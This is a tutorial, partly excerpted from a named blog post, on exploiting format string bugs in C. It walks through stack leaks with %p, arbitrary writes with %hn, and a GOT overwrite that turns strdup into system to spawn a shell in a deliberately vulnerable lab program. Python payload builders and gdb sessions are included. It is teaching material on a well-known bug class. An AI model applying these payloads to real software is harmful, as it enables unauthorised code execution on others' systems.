format string attack

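This article takes an in-depth look at how format string vulnerabilities work and how they are exploited, using worked examples to explain how the bug yields arbitrary memory writes and, ultimately, code execution.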

The following two articles both explain the topic well:


https://www.exploit-db.com/docs/28476.pdf

http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html


The second of these articles is excerpted below:


How do format string vulnerabilities work?

Format string vulnerabilities are a pretty silly class of bug that take advantage of an easily avoidable programmer error. If the programmer passes an attacker-controlled buffer as the format argument to printf (or any of the related functions, including sprintf, fprintf, etc.), the attacker can perform writes to arbitrary memory addresses. The following program contains such an error:

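#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
    char buffer[100];
    /* Note: strncpy does not NUL-terminate if argv[1] is 100 bytes or longer. */
    strncpy(buffer, argv[1], 100);
    /* BUG: attacker-controlled data is used as the format string. */
    printf(buffer);
    return 0;
}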

Since printf has a variable number of arguments, it must use the format string to determine the number of arguments. In the case above, the attacker can pass the string "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p" and fool the printf into thinking it has 15 arguments. It will naively print the next 15 addresses on the stack, thinking they are its arguments:

$ ./a.out "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
0xffffdddd 0x64 0xf7ec1289 0xffffdbdf 0xffffdbde (nil) 0xffffdcc4 0xffffdc64 (nil) 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520

At about 10 arguments up the stack, we can see a repeating pattern of 0x252070 - those are our %ps on the stack! We start our string with AAAA to see this more explicitly:

$ ./a.out "AAAA%p %p %p %p %p %p %p %p %p %p"
AAAA0xffffdde8 0x64 0xf7ec1289 0xffffdbef 0xffffdbee (nil) 0xffffdcd4 0xffffdc74 (nil) 0x41414141

The 0x41414141 is the hex representation of AAAA. We now have a way to pass an arbitrary value (in this case, we're passing 0x41414141) as an argument to printf. At this point we will take advantage of another format string feature: in a format specifier, we can also select a specific argument. For example, printf("%2$x", 1, 2, 3) will print 2. In general, we can do printf("%<some number>$x") to select an arbitrary argument to printf. In our case, we see that 0x41414141 is the 10th argument to printf, so we can simplify our string [1]:

$ ./a.out 'AAAA%10$p'
AAAA0x41414141
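
To make the link between the printed words and our own input concrete, the following Python sketch decodes a few of the 32-bit values from the output above as little-endian bytes. It assumes a little-endian x86 target, as in the examples here; the helper name `words_to_bytes` is made up for illustration.

```python
import struct

def words_to_bytes(words):
    """Pack 32-bit stack words as little-endian bytes, the way x86 stores them."""
    return b"".join(struct.pack("<I", w) for w in words)

# Three of the repeating words leaked by the "%p %p ..." run.
leaked = [0x25207025, 0x70252070, 0x20702520]
print(words_to_bytes(leaked))        # bytes of our own "%p %p ..." string

# The word that showed up once the string was prefixed with AAAA.
print(words_to_bytes([0x41414141]))
```

Reading the leak this way is a quick method for spotting which argument index lines up with the start of the buffer.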

So how do we turn this into an arbitrary write primitive? Well, printf has a really interesting format specifier: %n. From the man page of printf:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

If we were to pass the string AAAA%10$n, we would write the value 4 to the address 0x41414141! We can use another printf feature to write larger values: if we do printf("AAAA%100x"), 104 characters will be output (because %100x prints the argument padded to at least 100 characters). We can do AAAA%<value-4>x%10$n to write an arbitrary value to 0x41414141.

The next thing to know is that we almost certainly don't want to write all the characters in one go: for example, if we want to write the value 0x0804a004, we would have to write 134520836 characters to standard out! Instead, we break it up into two writes: first we write 0x0804 (2052) to the higher two bytes of the target address and then we write 0xa004 (40964) to the lower two bytes of the target address. To do this, we will use %hn to write only 2 bytes at a time. Such a format string might look like this: CAAAAAAA%2044x%10$hn%38912x%11$hn. Let's break this down so we can understand it.

  • CAAAAAAA - this is the address of the higher two bytes of the target (0x41414143) followed by the address of the lower two bytes of the target (0x41414141)
  • %2044x%10$hn - since we want to have written a total of 2052 bytes when we get to the first %hn, and we have already written 8 bytes so far, we need to write an additional 2044 bytes.
  • %38912x%11$hn - since we want to have written a total of 40964 bytes when we get to the second %hn, and we have already written 2052 bytes so far, we need to write an additional 38912 bytes.
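
The arithmetic in the list above can be sketched in Python. The helper `hn_paddings` is a hypothetical name, not part of any tool. It assumes each `%<n>x` conversion emits exactly `n` characters, which only holds when `n` is at least as wide as the printed value (up to 8 hex digits for a 32-bit argument).

```python
def hn_paddings(halfwords, already_written):
    """Return the %<n>x widths needed so that each successive %hn stores
    the corresponding 16-bit value from `halfwords`."""
    paddings = []
    count = already_written
    for target in halfwords:
        # %hn stores the running character count modulo 0x10000.
        pad = (target - count) % 0x10000
        paddings.append(pad)
        count += pad
    return paddings

# Write 0x0804 first (high half), then 0xa004 (low half), after the
# 8 address bytes "CAAAAAAA" have already been printed.
pads = hn_paddings([0x0804, 0xa004], already_written=8)
fmt = "CAAAAAAA%{}x%10$hn%{}x%11$hn".format(*pads)
print(pads)
print(fmt)
```

The modulo makes the helper usable even when the second halfword is smaller than the first, since the count seen by `%hn` wraps at 16 bits.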

Here is an example of how this might be used [2]:

./a.out "$(python -c 'import sys; sys.stdout.write("CAAAAAAA%2044x%10$hn%38912x%11$hn")')"

What can we do with them?

Since a format string vulnerability gives us the ability to write an arbitrary value to an arbitrary address, we can do a lot of things with it. Usually the easiest thing to do is write to a function pointer somewhere and turn our arbitrary write primitive into arbitrary code execution. In dynamically linked programs, these are easy to find. When a program attempts to execute a function in a shared library, it does not necessarily know the location of that function at compile time. Instead, it jumps to a stub function that has a pointer to the correct location of the function in the shared library. This pointer (located in the global offset table, or GOT) is initialized at runtime when the stub function is first called.

For example, when strcat is used in a program, the following piece of stub code allows the program to find the correct location in the shared library libc at run time:

$ objdump -d a.out
... <snip> ...
08048330 <strcat@plt>:
 8048330:       ff 25 04 a0 04 08       jmp    *0x804a004
 8048336:       68 08 00 00 00          push   $0x8
 804833b:       e9 d0 ff ff ff          jmp    8048310 <_init+0x3c>
... <snip> ...

Here you can see that strcat@plt is the stub function that jumps through the GOT entry for strcat (at the address 0x804a004), which is set at runtime to the location of the strcat function in libc. We can write any value we want to 0x804a004. When strcat is used later in the program, the program will instead transfer execution to the address we specified. A common technique is to overwrite the GOT entry with the address of the function system, thereby turning a call of strcat(buffer, "hello") into the call system(buffer) (if we can control the contents of buffer, we can get a shell!).
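
As a cross-check on the disassembly, the GOT address can be read straight out of the instruction bytes. This small Python sketch assumes the 32-bit x86 encoding shown above, where `ff 25` is an indirect `jmp` through an absolute 32-bit address stored in little-endian order; `got_slot_from_plt` is an illustrative name.

```python
import struct

def got_slot_from_plt(code):
    """Extract the GOT slot address from a 6-byte `jmp *abs32` PLT stub."""
    if code[:2] != b"\xff\x25":
        raise ValueError("not a jmp *abs32 instruction")
    (slot,) = struct.unpack("<I", code[2:6])
    return slot

# First instruction of the stub in the objdump listing: ff 25 04 a0 04 08
stub = bytes.fromhex("ff2504a00408")
print(hex(got_slot_from_plt(stub)))
```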

An example

For an example, we will exploit the following C program:

#include <stdio.h>
#include <string.h>
// compile with gcc -m32 temp.c

int main(int argc, char** argv) {
  printf(argv[1]);
  strdup(argv[1]);
}

Our plan is to overwrite the GOT entry of strdup with the address of system, so the program will call printf(argv[1]) and then system(argv[1]). Hence, our payload must be a valid argument to system - we will start our payload with sh;# (which will run sh and cause the rest of the payload to be treated as a comment. This also has the advantage of being exactly 4 bytes long, which isn't important for this example but is very useful in other cases).

For every format string exploit, our payload will eventually look something like this: <address><address+2>%<number>x%<offset>$hn%<other number>x%<offset+1>$hn. We prepare a payload that will be the same length as our final payload so we can start computing the correct offsets and addresses (note that we use %hp and %00000x so we can just modify the string in the last step without modifying its length):

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%00000x%17$hp%00000x%18$hp")')"
sh;#AAAABBBB00xf7fcbff48048449(nil)

Our goal is to find the correct offsets (instead of 17 and 18) so that we output sh;#AAAABBBB<garbage>0x41414141<garbage>0x42424242. This takes some work, but in our case the correct offsets are 99 and 100:

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%00000x%99$hp%00000x%100$hp")')"
sh;#AAAABBBB00x4141414180484490x42424242

It is important to note that our payload is very sensitive to a change in length: adding one byte to the end of the string will change the required offsets and perhaps mess up the alignment.

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%00000x%99$hp%00000x%100$hp")')A"
sh;#AAAABBBB00x2e00000080484490x6f2e612fA

This is because the arguments are passed onto the stack before the start of our program, and so changing the length of the arguments will change their alignment and the initial stack location for the program itself. In order to have our exploit work consistently, we need to ensure that the payload is at a consistent alignment (and at a consistent offset above us on the stack) by being careful to control the amount of stuff on the stack. This is also why we are using env -i as a wrapper for our program (it clears the environment, which is also passed onto the stack before the start of a program).

Anyway, let's find the strdup GOT entry:

$ objdump -d a.out
... <snip> ...
08048330 <strdup@plt>:
 8048330:       ff 25 04 a0 04 08       jmp    *0x804a004
 8048336:       68 08 00 00 00          push   $0x8
 804833b:       e9 d0 ff ff ff          jmp    8048310 <_init+0x3c>
... <snip> ...

Now we know where to write. We want to write the address of system to the strdup GOT entry, 0x804a004. For now, we plug our addresses into the payload and make sure everything still works out:

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#\x04\xa0\x04\x08\x06\xa0\x04\x08%00000x%99$hp%00000x%100$hp")')"
sh;#00x804a00480484490x804a006
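
The escaped bytes in that payload are just the two target addresses in little-endian order. A minimal Python sketch, assuming the GOT entry found above (the variable names are illustrative):

```python
import struct

GOT_STRDUP = 0x0804a004  # GOT entry of strdup, from the objdump output

# Address of the low halfword first, then of the high halfword (entry + 2).
addresses = struct.pack("<II", GOT_STRDUP, GOT_STRDUP + 2)
prefix = b"sh;#" + addresses

print(prefix)
print(len(prefix))  # number of bytes emitted before the first %x conversion
```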

The next step is to figure out what to write, namely the address of system. Since this is a 32-bit binary, we can disable libc randomization via:

$ ulimit -s unlimited

Now the address of system is at a deterministic location in memory. We can just open up the program in gdb and print the address of system:

$ gdb -q a.out
Reading symbols from /home/ppp/a.out...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048417
(gdb) r
Starting program: /home/ppp/a.out 

Breakpoint 1, 0x08048417 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x555c2250 <system>

All right, now we know that we need to write 0x555c2250 (the address of system) to the address 0x804a004 (the GOT entry of strdup). We do this in two parts: first we write 0x2250 to the two bytes at 0x804a004, then we write 0x555c to the two bytes at 0x804a006. We can figure out how many bytes to write in python:

$ python
>>> 0x2250 - 12 # We've already written 12 bytes ("sh;#AAAABBBB").
8772
>>> 0x555c - 0x2250 # We've already written 0x2250 bytes.
13068

Now we plug these values into our payload and change the %hp to %hn. Note that when we change the %00000x to %08772x, we keep the leading 0 so that our string stays the same length. Here is the final exploit:

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#\x04\xa0\x04\x08\x06\xa0\x04\x08%08772x%99$hn%13068x%100$hn")')"
sh;#..<garbage>..sh-4.2$ 

Woo hoo, we got our shell!
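
For reference, the whole construction can be reproduced in a few lines of Python. This is a sketch under this example's assumptions (GOT entry 0x804a004, system at 0x555c2250, argument offsets 99 and 100, low halfword written first); `build_payload` is a hypothetical helper, and the zero-padded 5-digit widths are there only to keep the payload the same length as the probe string.

```python
import struct

def build_payload(got_entry, target, first_offset, prefix=b"sh;#"):
    """Build a two-step %hn payload that stores `target` at `got_entry`."""
    head = prefix + struct.pack("<II", got_entry, got_entry + 2)
    low, high = target & 0xffff, target >> 16
    # %hn stores the running output count modulo 0x10000.
    pad_low = (low - len(head)) % 0x10000
    pad_high = (high - low) % 0x10000
    fmt = (f"%{pad_low:05d}x%{first_offset}$hn"
           f"%{pad_high:05d}x%{first_offset + 1}$hn")
    return head + fmt.encode("ascii")

payload = build_payload(0x0804a004, 0x555c2250, first_offset=99)
probe = b"sh;#AAAABBBB%00000x%99$hp%00000x%100$hp"

print(payload)
print(len(payload) == len(probe))  # the length must not change between runs
```

Note the same caveat as for any `%<n>x` padding: a width smaller than the printed value would emit more characters than requested and throw the count off.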

Debugging an exploit

Sometimes, things don't go as planned and we don't get a shell. If this happens, gdb is your friend. Unfortunately, gdb isn't a very good friend. It helpfully puts stuff in your environment, so any careful calculations you were doing related to the stack may no longer be valid. In order to resolve this, you need to make sure your environment looks like the environment used by gdb. We first see what the stack looks like under gdb and then always run our exploit with that environment:

$ env -i /usr/bin/printenv
$ gdb -q /usr/bin/printenv
Reading symbols from /usr/bin/printenv...(no debugging symbols found)...done.
(gdb) unset env
Delete all environment variables? (y or n) y
(gdb) r
Starting program: /usr/bin/printenv 
PWD=/home/ppp
SHLVL=0

Now that we know the environment used by gdb, we can make sure to always execute our payload with the same environment so we can test our exploit in gdb:

$ env -i PWD=$(pwd) SHLVL=0 ./a.out "$(python -c 'print "my_exploit_string"')" # Outside gdb.
$ gdb ./a.out # Inside gdb.
(gdb) unset env
Delete all environment variables? (y or n) y
(gdb) r "$(/usr/bin/python -c 'print "my_exploit_string"')"

The most helpful thing to do in gdb is to break just before the call to printf and make sure the argument and the stack are what you expect (if you expect to use %10$hn, make sure the value you control is the 10th argument after the format string). If that works, then break right after the call to printf and make sure the value you expect is at the target address.

Breakpoint 1, 0x080484ae in main ()
(gdb) x/2i $pc
=> 0x80484ae <main+74>: call   0x8048360 <printf@plt>
   0x80484b3 <main+79>: mov    $0x0,%eax
(gdb) x/a $esp
0xffffdb70: 0xffffdb98
(gdb) x/s 0xffffdb98
0xffffdb98:  "AAAA%10$p"
(gdb) x/11a $esp
0xffffdb70: 0xffffdb98  0xffffdddd  0x64    0xf7ec1289
0xffffdb80: 0xffffdbbf  0xffffdbbe  0x0 0xffffdca4
0xffffdb90: 0xffffdc44  0x0 0x41414141
(gdb) x/a $esp + 40
0xffffdb98: 0x41414141
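
The `$esp + 40` in the last command follows from the 32-bit calling convention used here: at the `call`, the format string pointer sits at `$esp`, and the Nth argument after it sits 4*N bytes higher. A tiny Python sketch of that arithmetic (the function name is illustrative, and it assumes 4-byte stack slots):

```python
def printf_arg_address(esp, n, slot_size=4):
    """Stack address of the n-th argument after the format string,
    given the value of esp right before the call to printf."""
    return esp + slot_size * n

# esp in the gdb session above is 0xffffdb70; %10$p selects argument 10.
print(hex(printf_arg_address(0xffffdb70, 10)))
```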

  1. You'll note the single quotes - $ is a special symbol on the shell and would otherwise need to be escaped. 

  2. You'll note that we print the exploit string in a python subshell. This isn't strictly necessary in this case, but for more interesting exploits the ability to print escape characters and use arbitrary bytes in our payload is very useful. We also print via sys.stdout.write to avoid the trailing newline we would get from print, and we surround the subshell in double quotes in case the payload has whitespace in it. 



